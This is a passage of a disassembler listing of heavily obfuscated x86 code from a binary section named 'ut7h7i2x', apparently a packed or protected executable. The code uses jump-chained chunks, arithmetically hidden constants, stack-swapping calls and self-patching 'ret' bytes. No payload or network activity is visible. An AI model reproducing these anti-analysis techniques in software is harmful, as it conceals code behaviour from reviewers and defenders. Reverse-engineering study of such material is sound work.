loc_44B7C5: ; CODE XREF: sub_444029:loc_4507F6j
jz loc_44AA79
jmp loc_43E531
; END OF FUNCTION CHUNK FOR sub_444029
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_60. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44B7D1: ; CODE XREF: ut7h7i2x:0043A976j
sub ebx, ebp
; =============== S U B R O U T I N E =======================================
sub_44B7D3 proc near ; CODE XREF: ut7h7i2x:00452750p
; FUNCTION CHUNK AT 00448C0C SIZE 00000006 BYTES
xchg eax, [esp+0]
pop eax
mov edx, 0D504D785h
push ecx
push 2DDFFAE0h
pop ecx
jmp loc_448C0C
sub_44B7D3 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_372. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44B7E9: ; CODE XREF: ut7h7i2x:00443449j
jmp locret_446AE0
; ---------------------------------------------------------------------------
rol ebx, 15h
jmp loc_44C9F0
; ---------------------------------------------------------------------------
loc_44B7F6: ; CODE XREF: ut7h7i2x:004501BCj
or eax, 512E82ABh
cmp eax, 1C1A8A8Fh
jmp loc_43C9B7
; ---------------------------------------------------------------------------
jns loc_454DEB
jmp loc_45732B
; ---------------------------------------------------------------------------
loc_44B812: ; CODE XREF: ut7h7i2x:0044E7CDj
pop ebx
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_44B813: ; CODE XREF: sub_44CE09:loc_44E7AFj
and edx, 94A7581Eh
rol edx, 12h
cmp edx, 81568532h
jmp loc_44A2B9
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
shl ecx, 7
push 0AF8EFACh
loc_44B82F: ; CODE XREF: ut7h7i2x:004428A4j
jmp sub_454466
; ---------------------------------------------------------------------------
loc_44B834: ; DATA XREF: sub_451F39-5381o
push 0B95DA15Ch
pop esi
sub esi, 42FB4A5Bh
jnb loc_454640
; START OF FUNCTION CHUNK FOR sub_4580CF
loc_44B846: ; CODE XREF: sub_4580CF-16232j
jmp nullsub_517
; END OF FUNCTION CHUNK FOR sub_4580CF
; ---------------------------------------------------------------------------
adc ecx, 4C0F8D57h
cmp esi, ecx
jmp loc_450190
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_450. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_44B859: ; CODE XREF: sub_44B5CF+E855j
jmp loc_451D3C
; END OF FUNCTION CHUNK FOR sub_44B5CF
; =============== S U B R O U T I N E =======================================
sub_44B85E proc near ; CODE XREF: ut7h7i2x:004423DFj
; sub_44A998+4p
; FUNCTION CHUNK AT 00440DFE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004472E0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044FEE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A7B8 SIZE 00000006 BYTES
xchg edi, [esp+0]
pop edi
call sub_4508DB
push 2956A0Ah
jmp loc_4472E0
sub_44B85E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45941F
loc_44B871: ; CODE XREF: sub_45941F:loc_4457D6j
xor eax, [ebx+ecx+4]
cmp eax, 7C61090Eh
retn
; END OF FUNCTION CHUNK FOR sub_45941F
; =============== S U B R O U T I N E =======================================
sub_44B87B proc near ; CODE XREF: sub_455EA7:loc_44821Ep
; sub_4519D2+13p
; FUNCTION CHUNK AT 0044F637 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00452B8A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A143 SIZE 00000005 BYTES
xor bx, bx
add ebx, 10000h
jmp loc_45A143
sub_44B87B endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_513. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_501. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4464B7
loc_44B88B: ; CODE XREF: sub_4464B7-88D0j
jmp loc_44A79C
; END OF FUNCTION CHUNK FOR sub_4464B7
; ---------------------------------------------------------------------------
mov ecx, 5B36F783h
xchg ecx, ebx
jmp sub_453354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_44B89C: ; CODE XREF: sub_43F1B2+1A5DEj
js loc_44D1DB
add edi, ebx
xchg ebp, [ecx]
loc_44B8A6: ; CODE XREF: sub_43F1B2:loc_44C96Fj
mov eax, [esp+0]
push eax
call sub_43CA2D
or eax, eax
jnz loc_4533E7
jmp loc_447BD5
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_44B8BC: ; CODE XREF: sub_43FF65+151FDj
call dword ptr [ebp-4]
test eax, eax
jz loc_44B4CE
jmp loc_441C5F
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_44B8CC: ; CODE XREF: sub_457A66:loc_452F23j
jz loc_440D34
jmp loc_445E0E
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_44B8D7: ; CODE XREF: sub_446F9A:loc_457046j
shl edx, 7
rol edi, 1Eh
jmp loc_454183
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
loc_44B8E2: ; CODE XREF: ut7h7i2x:loc_4394A5j
or ebp, 5500EF26h
jmp loc_43F848
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44B8ED: ; CODE XREF: ut7h7i2x:loc_44D926j
; sub_43AB62:loc_4518F6j
mov ds:dword_43C444, eax
retn
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
loc_44B8F3: ; CODE XREF: ut7h7i2x:004406E1j
jmp loc_43C3AC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44B8F8 proc near ; CODE XREF: sub_43AC9Cp
; ut7h7i2x:loc_43CE7Ap ...
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0044008E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444E20 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458520 SIZE 00000001 BYTES
push ebp
mov ebp, esp
jns loc_444E20
add esp, 0FFFFFFE4h
jmp loc_44008E
sub_44B8F8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44B909 proc near ; DATA XREF: sub_447CBE:loc_450217o
; FUNCTION CHUNK AT 0043B05E SIZE 00000005 BYTES
call sub_43AED9
xor eax, 0D8FC337Eh
push edx
push offset sub_4543AB
jmp loc_43B05E
sub_44B909 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_44B91F: ; CODE XREF: sub_43FCEE+118DEj
cmp al, 0A4h
jz loc_43D9D2
jmp loc_452DC7
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
loc_44B92C: ; CODE XREF: ut7h7i2x:00448C9Aj
cdq
jmp loc_4527D1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4590CF
loc_44B932: ; CODE XREF: sub_4590CF:loc_444347j
sub eax, 7FD8E9D2h
xor eax, 16195BC7h
add eax, ebp
call sub_456111
; END OF FUNCTION CHUNK FOR sub_4590CF
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_44B945: ; CODE XREF: sub_4503C3-7FEDj
jmp loc_439D89
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B122
loc_44B94A: ; CODE XREF: sub_44B122-A399j
jmp loc_441614
; END OF FUNCTION CHUNK FOR sub_44B122
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_110. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44B950: ; CODE XREF: ut7h7i2x:00439F11j
cdq
jmp loc_458A36
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_286. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44B957: ; CODE XREF: ut7h7i2x:00444C9Aj
jmp loc_445FFF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_132. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44B95D: ; CODE XREF: ut7h7i2x:0044F517j
jmp locret_43A452
; ---------------------------------------------------------------------------
dw 0EFF4h
dword_44B964 dd 7835B51Fh ; DATA XREF: ut7h7i2x:00439126w
; sub_4462B0:loc_443569r ...
; ---------------------------------------------------------------------------
loc_44B968: ; CODE XREF: ut7h7i2x:0045A6C5j
jmp loc_455693
; =============== S U B R O U T I N E =======================================
sub_44B96D proc near ; CODE XREF: sub_40456B+40p
; sub_40FBF7+222p ...
call sub_4596E5
jmp ds:off_41D1AC
sub_44B96D endp
; ---------------------------------------------------------------------------
loc_44B978: ; CODE XREF: ut7h7i2x:00448E5Aj
jmp locret_44918D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4395FB
loc_44B97D: ; CODE XREF: sub_4395FB+81F6j
jmp loc_449DAE
; END OF FUNCTION CHUNK FOR sub_4395FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E68B
loc_44B982: ; CODE XREF: sub_43E68B:loc_43A7A0j
add eax, ebp
not edx
jmp sub_44AA33
; END OF FUNCTION CHUNK FOR sub_43E68B
; =============== S U B R O U T I N E =======================================
sub_44B98B proc near ; DATA XREF: ut7h7i2x:loc_44EA60o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043D150 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004422C5 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044D044 SIZE 00000006 BYTES
add ebx, 7715B588h
add eax, ebx
pop ebx
ror eax, 3
xor eax, 45874D7Dh
ror eax, 1Bh
push edx
jmp loc_4422C5
sub_44B98B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push 4A709071h
pop eax
xor eax, 0D6A8103Dh
or eax, 0AF032F5Fh
xor eax, 25AC15D2h
jmp loc_44D12C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44B9C3: ; CODE XREF: sub_43AA94+D1E8j
push edx
mov edx, eax
xchg edx, [esp+0Ch+var_C]
mov edx, eax
call sub_43F058
push esi
push 1980500Bh
jmp loc_449D1A
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_44B9DB: ; CODE XREF: sub_44865D-F47Cj
jno loc_441A33
pushf
loc_44B9E2: ; CODE XREF: ut7h7i2x:00451944j
test ebp, 9CECA39Fh
jmp loc_45ADC8
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_44B9ED: ; CODE XREF: sub_43F7A5+134A4j
rol edx, 1Ah
and edx, 0B66EFFF3h
xor edx, 6217B9DFh
add edx, 8FE8363Bh
mov [edx], eax
pop edx
lea eax, nullsub_8
mov byte ptr [eax], 0C3h
jmp loc_44A884
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C9F5
loc_44BA13: ; CODE XREF: sub_43C9F5+D77Bj
jg loc_455783
or ecx, 33D2578Dh
jmp loc_43D8D4
; END OF FUNCTION CHUNK FOR sub_43C9F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450472
loc_44BA24: ; CODE XREF: sub_450472+7275j
push 9CF70D1Ah
jge loc_43BE08
add edi, ebx
mov ebp, 440DFEE8h
jmp loc_452E8C
; END OF FUNCTION CHUNK FOR sub_450472
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44092D
loc_44BA3B: ; CODE XREF: sub_44092D:loc_4499C8j
cdq
xor ebp, esi
cmp ebp, 502BBEAh
jmp loc_449AF1
; END OF FUNCTION CHUNK FOR sub_44092D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45633E
loc_44BA49: ; CODE XREF: sub_45633E-11D74j
jz loc_443927
jmp loc_4458F0
; END OF FUNCTION CHUNK FOR sub_45633E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_44BA54: ; CODE XREF: sub_455060-AA2Dj
jnz loc_44BBAB
loc_44BA5A: ; CODE XREF: sub_456FB3+Aj
jmp loc_44FBC7
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C66
loc_44BA5F: ; CODE XREF: sub_452C66-71B1j
jmp loc_43F60C
; END OF FUNCTION CHUNK FOR sub_452C66
; ---------------------------------------------------------------------------
shl edi, 8
jmp loc_44BBA3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B727
loc_44BA6C: ; CODE XREF: sub_43B727+1Cj
call sub_44FAC2
; END OF FUNCTION CHUNK FOR sub_43B727
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_44BA71: ; CODE XREF: sub_4518D7-1C19j
mov ebx, ebp
pop ebp
pop ebp
jmp loc_451FAA
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
push edx
mov edx, ebp
jmp loc_4457CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_44BA82: ; CODE XREF: sub_4471CA+E93Dj
jz loc_45192A
; END OF FUNCTION CHUNK FOR sub_4471CA
; START OF FUNCTION CHUNK FOR sub_44F300
loc_44BA88: ; CODE XREF: sub_44F300+7552j
jmp nullsub_402
; END OF FUNCTION CHUNK FOR sub_44F300
; ---------------------------------------------------------------------------
loc_44BA8D: ; CODE XREF: ut7h7i2x:004410EBj
jmp loc_458AA3
; ---------------------------------------------------------------------------
and edx, 0EA2C4C6Ch
popf
jmp loc_4480D3
; ---------------------------------------------------------------------------
loc_44BA9E: ; CODE XREF: ut7h7i2x:00444155j
jz loc_44A5B7
jmp loc_44714F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C66
loc_44BAA9: ; CODE XREF: sub_452C66-5579j
push ecx
mov ecx, edx
xchg ecx, [esp+0]
push 605668B8h
pop edx
jmp loc_44BA5F
; END OF FUNCTION CHUNK FOR sub_452C66
; ---------------------------------------------------------------------------
loc_44BABA: ; CODE XREF: ut7h7i2x:0043A47Aj
and ecx, 1AE6ECD3h
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_44BAC0: ; CODE XREF: sub_44A3BB:loc_43A46Dj
add eax, 0BA5E03Bh
add eax, ebp
add eax, 0C355D78Dh
push offset sub_43EDD8
jmp loc_4442B9
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_44BAD8: ; CODE XREF: sub_449E96-7590j
add eax, 393CD2F2h
call sub_43AA94
mov ds:off_41D11C, eax
; END OF FUNCTION CHUNK FOR sub_449E96
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_44BAE9: ; CODE XREF: sub_44EB88-D563j
lea eax, loc_454B3E
jmp loc_456CDE
; END OF FUNCTION CHUNK FOR sub_44EB88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440944
loc_44BAF4: ; CODE XREF: sub_440944:loc_4411F3j
sub eax, 55391748h
ror eax, 1Dh
push edi
push 8F7062A8h
pop edi
add edi, 0BBA646E4h
sub edi, 7CBFBB99h
add edi, 0F6B39E5Ch
jmp loc_446FF4
; END OF FUNCTION CHUNK FOR sub_440944
; ---------------------------------------------------------------------------
loc_44BB1B: ; CODE XREF: ut7h7i2x:loc_441451j
sub ebx, 0BD7F214Ah
rol ebx, 0Ch
xor ebx, 6C22DDD1h
add ebx, 3E142129h
xchg ebx, [esp]
jmp loc_457176
; ---------------------------------------------------------------------------
test edi, 0F792B414h
jmp loc_454C0F
; ---------------------------------------------------------------------------
push 65832F3h
jmp loc_458FFD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D60
loc_44BB4D: ; CODE XREF: sub_449D60:loc_44DE02j
mov ecx, esi
sbb esi, 0B98AAE74h
jmp loc_44226D
; END OF FUNCTION CHUNK FOR sub_449D60
; ---------------------------------------------------------------------------
loc_44BB5A: ; CODE XREF: ut7h7i2x:0044DB2Dj
ror edx, 7
sbb esi, 0BEB07D97h
jo loc_4563D1
loc_44BB69: ; CODE XREF: ut7h7i2x:loc_43C3ACj
call sub_44BB6F
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44BB6F proc near ; CODE XREF: sub_442DA3p
; ut7h7i2x:loc_44BB69p ...
push ebp
mov ebp, esp
sub_44BB6F endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_44BB72: ; CODE XREF: sub_43FF65:loc_4459E3j
jmp loc_44DE17
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E8A5
loc_44BB77: ; CODE XREF: sub_44E8A5-1E0j
jle loc_44C36F
ror eax, 0Fh
test edx, edi
jmp loc_43F870
; END OF FUNCTION CHUNK FOR sub_44E8A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459A71
loc_44BB87: ; CODE XREF: sub_459A71+1Aj
mov ds:off_41D1B0, eax
lea eax, sub_459A71
mov byte ptr [eax], 0C3h
jmp sub_459A71
; ---------------------------------------------------------------------------
loc_44BB9B: ; CODE XREF: sub_459A71+1j
mov eax, [esp+0]
jmp loc_451831
; END OF FUNCTION CHUNK FOR sub_459A71
; ---------------------------------------------------------------------------
loc_44BBA3: ; CODE XREF: ut7h7i2x:0044BA67j
sbb eax, 0F1D522A3h
or edi, esi
; START OF FUNCTION CHUNK FOR sub_455060
loc_44BBAB: ; CODE XREF: sub_455060:loc_44BA54j
xor ecx, 8B8F041Eh
and ecx, 0B11DA27h
push offset sub_44C08E
jmp loc_450636
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456F1D
loc_44BBC1: ; CODE XREF: sub_456F1D:loc_45A296j
or edx, esi
jmp loc_452AFD
; END OF FUNCTION CHUNK FOR sub_456F1D
; ---------------------------------------------------------------------------
locret_44BBC8: ; CODE XREF: ut7h7i2x:loc_4493F7j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44BBC9: ; CODE XREF: sub_43A556+7A03j
jmp loc_456F5A
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_44BBCE: ; CODE XREF: sub_43A513:loc_4478CBj
pop ecx
loc_44BBCF: ; CODE XREF: sub_43A513+9847j
mov [ebp-20h], eax
loc_44BBD2: ; CODE XREF: sub_43A513+9850j
; sub_43A513:loc_4490C5j
jo loc_44CEA3
test byte ptr [ebp-7], 8
jz loc_45167E
push offset sub_43BDF6
jmp nullsub_84
; END OF FUNCTION CHUNK FOR sub_43A513
; =============== S U B R O U T I N E =======================================
sub_44BBEC proc near ; CODE XREF: sub_44764B:loc_456732j
var_4 = dword ptr -4
push ebp
mov ebp, eax
xchg ebp, [esp+4+var_4]
ror eax, 8
loc_44BBF5: ; CODE XREF: ut7h7i2x:0045753Cj
mov ds:dword_446644, eax
retn
sub_44BBEC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449744
loc_44BBFC: ; CODE XREF: sub_449744+B7FCj
jmp loc_43CADF
; END OF FUNCTION CHUNK FOR sub_449744
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_44BC01: ; CODE XREF: sub_44B789-C182j
jmp loc_44079B
; END OF FUNCTION CHUNK FOR sub_44B789
; ---------------------------------------------------------------------------
loc_44BC06: ; CODE XREF: ut7h7i2x:00459F20j
jb loc_442268
push eax
shl edi, 0Ah
test edi, ebp
jmp loc_44C27E
; ---------------------------------------------------------------------------
push 0C7D6A5EDh
pop eax
rol eax, 1Dh
add eax, 0D9ACC3F2h
push ecx
pushf
push 6F63CA8Eh
jmp loc_44A8A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452CBB
loc_44BC32: ; CODE XREF: sub_452CBB:loc_443A8Dj
jz loc_450D51
jmp loc_449EF3
; END OF FUNCTION CHUNK FOR sub_452CBB
; ---------------------------------------------------------------------------
loc_44BC3D: ; CODE XREF: ut7h7i2x:loc_440C26j
mov edi, ebx
xchg edi, [esp]
push eax
pop ebx
xchg ebx, [esp]
call sub_454ABB
jmp loc_44AC31
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_44BC51: ; CODE XREF: sub_440CEC:loc_43B7D3j
push offset loc_45AB15
jmp nullsub_162
; END OF FUNCTION CHUNK FOR sub_440CEC
; ---------------------------------------------------------------------------
loc_44BC5B: ; CODE XREF: ut7h7i2x:0044DF3Ej
xor ecx, 27F49EAFh
or ecx, 0EB96795Fh
add ecx, 14AA569Dh
mov [ecx], eax
pop ecx
lea eax, loc_43C246
jmp loc_458BB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A030
loc_44BC7B: ; CODE XREF: sub_44A030:loc_455372j
pop esi
or esi, 0FC06D0ACh
add esi, 54FD005Ah
or esi, 0B47F9336h
jnz loc_43CF11
; END OF FUNCTION CHUNK FOR sub_44A030
; START OF FUNCTION CHUNK FOR sub_455775
loc_44BC94: ; CODE XREF: ut7h7i2x:0044042Aj
; sub_455775-8E4Fj
jmp loc_43E9FE
; END OF FUNCTION CHUNK FOR sub_455775
; ---------------------------------------------------------------------------
cmp ecx, 0AEEA35A5h
jmp loc_453E69
; ---------------------------------------------------------------------------
loc_44BCA4: ; CODE XREF: ut7h7i2x:0043AFE7j
push ebx
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_44BCA5: ; CODE XREF: sub_44F43B:loc_43AFC1j
xor edx, 0B87B533Bh
jmp loc_45681D
; ---------------------------------------------------------------------------
loc_44BCB0: ; CODE XREF: sub_44F43B:loc_44B4CEj
cmp byte ptr [ebp-5], 0
jnz loc_456C0D
jmp loc_457DD7
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
locret_44BCBF: ; CODE XREF: ut7h7i2x:00441218j
retn
; ---------------------------------------------------------------------------
locret_44BCC0: ; CODE XREF: ut7h7i2x:00459FDEj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451900
loc_44BCC1: ; CODE XREF: sub_451900+8CDDj
jmp nullsub_450
; END OF FUNCTION CHUNK FOR sub_451900
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44081E
loc_44BCC6: ; CODE XREF: sub_44081E-234Ej
jmp loc_4516B0
; END OF FUNCTION CHUNK FOR sub_44081E
; =============== S U B R O U T I N E =======================================
sub_44BCCB proc near ; CODE XREF: sub_44FDF2-12085p
; sub_44DF79:loc_443D77j ...
; FUNCTION CHUNK AT 0044190E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044D410 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451F29 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004562D2 SIZE 00000018 BYTES
xchg eax, [esp+0]
pop eax
movzx eax, word ptr [eax]
shl eax, 2
jmp loc_4562D2
sub_44BCCB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44BCDA: ; CODE XREF: ut7h7i2x:00441CCDj
and ebp, 584A7013h
pushf
jmp loc_44CD53
; ---------------------------------------------------------------------------
loc_44BCE6: ; CODE XREF: ut7h7i2x:0044B172j
sub al, 99h
push 44F19CDCh
pop edx
xor edx, 848986BCh
or edx, 0E979E6A9h
jmp loc_44B250
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_378. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_44BD00: ; CODE XREF: sub_44A3BB-70CBj
jmp loc_4482F9
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_44BD05: ; CODE XREF: sub_45A79F-EA46j
jz loc_448B14
jmp loc_449A86
; END OF FUNCTION CHUNK FOR sub_45A79F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_44BD10: ; CODE XREF: sub_43DBEC+5CB9j
rol eax, 0Eh
xor eax, 0C1268394h
add eax, ebp
add eax, 5564FB52h
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_446C28
jmp loc_450E87
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_44BD31: ; CODE XREF: sub_43CAF4-E1Dj
jl loc_43F64E
loc_44BD37: ; CODE XREF: sub_43CAF4:loc_43B6D6j
mov eax, [esp-4+arg_0]
push eax
call sub_43CA2D
or eax, eax
jnz loc_45179E
jmp loc_43EEDA
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_44BD4D: ; CODE XREF: sub_45A79F-18C1Ej
; sub_45A79F:loc_45ACBFj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_448B19
jmp loc_44BD05
; END OF FUNCTION CHUNK FOR sub_45A79F
; ---------------------------------------------------------------------------
loc_44BD5E: ; DATA XREF: sub_44064B+17B9Ao
jnz loc_45246C
mov eax, [ebp+8]
or dword ptr [eax-8], 8
jmp loc_43F112
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45AAD1
loc_44BD70: ; CODE XREF: sub_4524FE:loc_44F0B7j
; sub_45AAD1+4j
cmp dword ptr [ebp-1Ch], 67h
jnz loc_44F0C8
jmp loc_4597AF
; END OF FUNCTION CHUNK FOR sub_45AAD1
; ---------------------------------------------------------------------------
rol ebx, 1Bh
loc_44BD82: ; CODE XREF: ut7h7i2x:0043B831j
jmp sub_44E84C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5BE
loc_44BD87: ; CODE XREF: sub_44D5BE:loc_453007j
and ecx, 4620D9E5h
add ecx, 0BA4483A6h
xchg ecx, [esp+0]
jmp loc_43C1C8
; END OF FUNCTION CHUNK FOR sub_44D5BE
; ---------------------------------------------------------------------------
loc_44BD9B: ; DATA XREF: sub_44DB3Eo
jo loc_451C01
push ebx
mov ebx, ebp
push offset sub_45076D
jmp loc_44A671
; ---------------------------------------------------------------------------
mov ecx, 1BC92ABBh
jmp sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_44BDB8: ; CODE XREF: sub_444A12+8386j
and ecx, 0EAC47F65h
add ecx, 0BDA3B852h
; END OF FUNCTION CHUNK FOR sub_444A12
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44BDC4: ; CODE XREF: sub_43AA94:loc_446CD9j
xor ecx, 63352C9Bh
sub eax, ecx
pop ecx
xor eax, 0E68F9C23h
sub eax, 0E5CE4A21h
loc_44BDD9: ; CODE XREF: sub_453188:loc_4517B1j
push edi
jmp loc_448400
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_44BDDF: ; CODE XREF: sub_44DF79:loc_43BBCAj
jz loc_443D7F
jmp loc_43D518
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
locret_44BDEA: ; CODE XREF: ut7h7i2x:00443733j
retn
; ---------------------------------------------------------------------------
loc_44BDEB: ; CODE XREF: ut7h7i2x:0044E247j
add edi, 93F01C97h
; =============== S U B R O U T I N E =======================================
sub_44BDF1 proc near ; CODE XREF: sub_443127+3p
; FUNCTION CHUNK AT 0043BD63 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442034 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00445178 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448747 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044A23B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F4C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450B5E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045786C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459320 SIZE 0000000A BYTES
xchg eax, [esp+0]
pop eax
push 62999A5Fh
pop eax
add eax, 4D258B38h
jmp loc_45786C
sub_44BDF1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44BE06: ; DATA XREF: sub_4459EE+F656o
push ecx
push 0D3656A8h
pop ecx
add ecx, 185D751Eh
sub ecx, 0AD3C38C9h
jmp loc_45656D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451A7D
loc_44BE1E: ; CODE XREF: sub_451A7D+18j
xchg edi, [esp+0]
jmp loc_44367A
; END OF FUNCTION CHUNK FOR sub_451A7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444266
loc_44BE26: ; CODE XREF: sub_444266:loc_457DD7j
jz loc_44498B
